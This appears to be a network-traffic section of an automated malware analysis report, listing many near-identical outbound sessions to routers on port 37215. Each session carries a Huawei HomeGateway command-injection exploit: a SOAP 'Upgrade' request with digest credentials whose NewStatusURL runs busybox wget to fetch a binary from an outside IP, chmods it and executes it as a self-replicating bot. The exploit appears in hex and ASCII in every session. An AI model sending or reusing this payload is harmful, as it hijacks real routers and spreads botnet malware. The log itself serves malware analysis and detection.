                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          426192.168.2.2341914157.214.19.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185889006 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          427192.168.2.2351178197.51.156.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185986996 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          428192.168.2.234419641.10.19.21637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.186006069 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          429192.168.2.2343072197.85.178.8537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.186012030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          430192.168.2.234766041.187.113.22337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.186027050 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          431192.168.2.234797463.162.198.2237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.186033964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          432192.168.2.2358558197.201.56.11737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.186039925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          433192.168.2.2334230197.61.33.20037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.186064959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          434192.168.2.2341242157.78.184.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.186068058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          435192.168.2.2340220157.117.129.19137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.186218977 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
